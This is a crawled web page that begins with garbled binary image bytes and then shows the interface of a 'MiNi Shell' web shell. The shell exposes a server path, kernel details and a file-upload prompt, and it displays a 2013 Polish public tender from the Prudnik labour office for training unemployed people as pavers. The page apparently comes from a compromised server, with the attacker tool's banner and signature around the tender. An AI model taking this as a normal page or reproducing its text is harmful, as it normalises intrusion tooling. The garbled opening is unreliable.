JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/97531-N-2013.html

<p class="kh_header"><b>Prudnik: Szkolenie pod nazwą : Brukarz dla 10 osób bezrobotnych. PUP.Or.321.3.2013</b><br>
<b>Numer ogłoszenia: 97531 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Prudniku , ul. Jagiellońska 21, 48-200 Prudnik, woj. opolskie, tel. 077 4362304, faks 077 4363782.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.prudnik.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie pod nazwą : Brukarz dla 10 osób bezrobotnych. PUP.Or.321.3.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest świadczenie przez Wykonawcę usługi szkoleniowej dla osób bezrobotnych. Wykonawca jest zobowiązany do zorganizowania i przeprowadzenia szkolenia pod nazwą: Brukarz dla 10 osób bezrobotnych.
Szkolenie finansowane jest ze środków Funduszu Pracy w ramach programu specjalnego pn. Młodzi na starcie. Ilość osób:W szkoleniu weźmie udział 10 osób bezrobotnych, 
Zajęcia praktyczne i teoretyczne będą prowadzone równolegle dla wszystkich uczestników szkolenia.
Ilość godzin:Harmonogram szkolenia powinien uwzględniać prowadzenie szkolenia w dniach od poniedziałku do piątku, w wymiarze nie przekraczającym 8 godzin zegarowych dziennie i przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu. Zajęcia powinny odbywać się od godziny 8:00 do godziny maksymalnie 16:00.
szczegółowy preliminarz kosztów - załączony do oferty -  uwzględniający wszystkie koszty związane z organizacją szkolenia - w tym kosztów: za badania lekarskie -medycyna pracy, egzamin oraz koszty materiałów dydaktycznych -podręczniki, notatniki, długopisy, teczki na materiały, odzież ochronna :obuwie + ubranie, nakolanniki, czapki - dla każdego uczestnika szkolenia, które po zakończeniu szkolenia przechodzą na własność każdego uczestnika szkolenia, sprzętu i materiałów wykorzystywanych do zajęć praktycznych do wykonania powierzchni o wymiarze 200 m2, napoje regeneracyjne - z wyszczególnieniem kosztów przypadających na 1 osobę i kosztów 1 osobogodziny - ZAŁĄCZNIK  NR  3 do SIWZ;
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny preliminarz kosztów.
Termin realizacji:Szkolenie rozpocznie się w terminie do 7 dni od dnia zawarcia umowy.
Szkolenie zakończy się najpóźniej w dniu 02.08.2013r.
Miejsce szkolenia:
Zajęcia teoretyczne - miasto Prudnik.
Zajęcia praktyczne - miasto Prudnik -miejsce wskazane przez zamawiającego
Cele szkolenia i bloki tematyczne:
Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania zawodu brukarz. Szkolenie ma na celu nabycie przez uczestników szkolenia umiejętności z zakresu posługiwania się narzędziami, sprzętem budowlanym, nauka czynności pomiarowych przy robotach brukarskich, wykonywanie sztucznego podłoża, podsypek, układanie nawierzchni i krawężników, brukowanie powierzchni wszystkich typów z kamieni naturalnych i sztucznych, czytanie dokumentacji technicznej.
Bloki tematyczne:
Program szkolenia teoretycznego i praktycznego powinien obejmować łącznie co najmniej 150 godzin zegarowych na każdego uczestnika szkolenia, w tym zajęcia teoretyczne min. 30 godzin zegarowych i zajęcia praktyczne min. 120 godzin zegarowych.
Program szkolenia powinien zawierać co najmniej następujące zagadnienia obejmujące:
Przepisy BHP i p.-poż.,
Zarys teorii w zawodzie brukarz,
Materiałoznawstwo,
Technologia prac brukarskich,
Charakterystyka prac brukarskich,
Maszynoznawstwo,
Praktyczna nauka zawodu.
Dodatkowe informacje:
Zamawiający wymaga, aby Wykonawca  zastosował nowe materiały do wykonania 200,00 m 2  nawierzchni - 150 m 2 kostki szarej prostokątnej o grubości 8 cm, 50 m 2 o grubości 6cm, 50 m 2 obrzeży betonowych -chodnikowych, kruszywa -piasek, kamień, cement oraz zabezpieczenie narzędzi do wykonania robót brukarskich - łopaty, łom, taczki, poziomice, niwelator, paliki, ubijarka mechaniczna, koparko-ładowarka. Zabezpieczenie wywozu gruzu-ziemi powstałego przy rozbiórce i budowie chodnika na najbliższe wysypisko.
Materiał pozostały z rozbiórki nawierzchni pozostaje do dyspozycji Zamawiającego.
Wykonawca zapewni dla każdego uczestnika szkolenia:
materiały szkoleniowe zgodne z tematyką zajęć -bindowane w formie trwałego skryptu lub podręcznik, notatnik, długopis, teczkę na materiały dydaktyczne;
odzież ochronną -obuwie + ubranie, nakolanniki, czapki na zajęciach praktycznych, która po zakończeniu szkolenia przechodzi na własność każdego uczestnika,
napoje regeneracyjne oraz kubki, łyżeczki, woda, sok, kawa, herbata, cukier w formie ciągłej przez cały okres trwania szkolenia;
warunki pracy zgodne z przepisami BHP,
niezbędne badania lekarskie dla każdego uczestnika szkolenia -medycyna pracy,
dostosowanie wyposażenia dydaktycznego i pomieszczeń do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.
4. Wykonawca po zakończeniu szkolenia wyda zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanych kwalifikacji zawierający: numer z rejestru,imię i nazwisko oraz numer PESEL; nazwę instytucji szkoleniowej przeprowadzającej szkolenie,formę i nazwę szkolenia,okres trwania szkolenia,
miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskane kwalifikacje, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie.
Wykonawca w dniu zakończenia szkolenia dokona oceny i przeprowadzi analizę szkolenia  za pomocą ankiety wypełnionej przez każdego uczestnika szkolenia.
Dodatkowe dokumenty: wzór zaświadczenia;
Program szkolenia, który powinien zawierać:nazwę i zakres szkolenia, czas trwania i sposób organizacji szkolenia,	wymagania wstępne dla uczestników szkolenia,
cele szkolenia,plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar z uwzględnieniem części teoretycznej i praktycznej,opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
przewidziane sprawdziany i egzaminy,
liczbę, nazwiska i kwalifikacje kadry dydaktycznej;
lokalizację szkolenia zajęcia teoretyczne i praktyczne;
wskazanie opiekuna do sprawowania bezpośredniego nadzoru nad szkoleniem i współpracy z PUP w Prudniku.
Referencje potwierdzające przeprowadzenie dwóch szkoleń w tej samej tematyce lub bardzo zbliżonej zawartej w przedmiocie zamówienia na kwotę nie mniejszą niż 15.000,00 tysięcy złotych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada wpis do Rejestru Instytucji Szkoleniowych zgodnie z Ustawą o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004 roku Dz.U. z 2008 roku, Nr 69, poz. 415 z późn. zmianami oraz Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004 roku w sprawie rejestru instytucji szkoleniowych Dz.U. z 2004 roku, Nr 236, poz. 2365 z późn. zmianami prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy oraz potwierdzą, że wpis został zaktualizowany na 2013 rok.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie posiadania wiedzy i doświadczenia poprzez wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 szkoleń, kursów o wartości równej lub wyższej niż 15.000,00 zł każde, ściśle związanych z przedmiotem zamówienia dla  -osób bezrobotnych -  z wykazaniem: - przedmiotu zamówienia -nazwa kursu, szkolenia, -dat wykonania zamówienia od - do, - nazwy zamawiającego -odbiorcy, wartości brutto każdego zamówienia. Do Wykazu należy załączyć dokumenty potwierdzające, że usługi zostały lub są wykonywane należycie np. referencje, protokoły odbioru.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże, że dysponuje bazą lokalową na terenie miasta Prudnik, gwarantującą należyte i pełne wykonanie usługi szkoleniowej w zakresie zajęć teoretycznych. Ponadto uczestnicy szkolenia będą mieć zapewniony dostęp do zaplecza socjalnego i sanitarnego. Wykonawca musi zapewnić warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaże, że osoby-wykładowcy- uczestniczące w wykonaniu zamówienia, odpowiedzialne za prowadzenie zajęć, w tym opiekunowie zajęć praktycznych posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia oraz informacji o podstawie dysponowania tymi osobami; to jest: wykształcenie minimum średnie zgodne z tematyką prowadzonych zajęć teoretycznych oraz doświadczenie w prowadzeniu co najmniej 2 szkoleń w zakresie zgodnym z obecnym przedmiotem zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Szczegółowy preliminarz kosztów - załączony do oferty -  uwzględniający wszystkie koszty związane z organizacją szkolenia - w tym kosztów: za badania lekarskie -medycyna pracy, egzamin oraz koszty materiałów dydaktycznych -podręczniki, notatniki, długopisy, teczki na materiały, odzież ochronna - dla każdego uczestnika szkolenia, które po zakończeniu szkolenia przechodzą na własność każdego uczestnika szkolenia, sprzętu i materiałów wykorzystywanych do zajęć praktycznych do wykonania powierzchni o wymiarze 200 m2, napoje regeneracyjne  - z wyszczególnieniem kosztów przypadających na 1 osobę i kosztów 1 osobogodziny - ZAŁĄCZNIK  NR  3 do SIWZ;
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny preliminarz kosztów.
Program szkolenia - załączony do oferty.
Hamonogram szkolenia - załączony do oferty - powinien uwzględniać  prowadzenie szkolenia w dniach od poniedziałku do piątku, w wymiarze nie przekraczającym 8 godzin zegarowych dziennie i przeciętnie nie mniej niż 25 godzin zegarowych  w tygodniu. Zajęcia powinny odbywać się od godziny 8:00 do godziny maksymalnie 16:00.
Wykonawca polegający na wiedzy i doświadczeniu lub osobach zdolnych do  wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, jest zobowiązany do udowodnienia w składanej ofercie, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymienione w pkt 1, lit a i b niniejszego Rozdziału SIWZ składa każdy z Wykonawców oddzielnie. Oświadczenie, o którym mowa w pkt 1, lit c niniejszego Rozdziału SIWZ, składane jest wspólnie przez Wykonawców. Dokumenty wskazane w pkt 1, lit d, e, f, g niniejszego Rozdziału SIWZ mogą zostać złożone przez jednego z Wykonawców albo wspólnie.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt 1, lit b niniejszego Rozdziału SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokumenty, o których mowa w pkt. 1 składane są w oryginale lub kopii potwierdzonej zgodnie z zasadą reprezentacji Wykonawcy wskazaną w dokumentach rejestrowych Wykonawcy albo przez osobę umocowaną w sposób właściwy do dokonania czynności poświadczania dokumentów za zgodność z oryginałem oraz nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
albo
że  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty 
zaległych płatności lub    wstrzymanie w całości wykonania decyzji właściwego organu -wystawiony nie wcześniej niż 3  miesiące przed upływem terminu składania ofert.
W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawca, wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24, ust. 2, pkt 4 ustawy Pzp, albo informację, że nie należy do grupy kapitałowej - ZAŁĄCZNIK  NR  5  do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70.00</li>
<li>2 - Doświadczenie Wykonawcy - 30.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty w zakresie:
zmiany terminu wykonania umowy - pod warunkiem:
zmiany terminu przeprowadzenia egzaminu przez inny podmiot niż Wykonawca,  z przyczyn niezależnych od Wykonawcy;
z powodu siły wyższej;
zmniejszenia ilości uczestników szkolenia przez Zamawiającego pod warunkiem  
nie zwiększenia kosztów szkolenia jednego uczestnika szkolenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.prudnik.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Prudniku, 48-200 Prudnik, ul. Jagiellońska 21, Sekretariat - pokój nr 3, I piętro lub ze strony internetowej: http://pup.prudnik.ibip.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Prudniku, 48-200 Prudnik, ul. Jagiellońska 21, Sekretariat  pokój nr 3, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com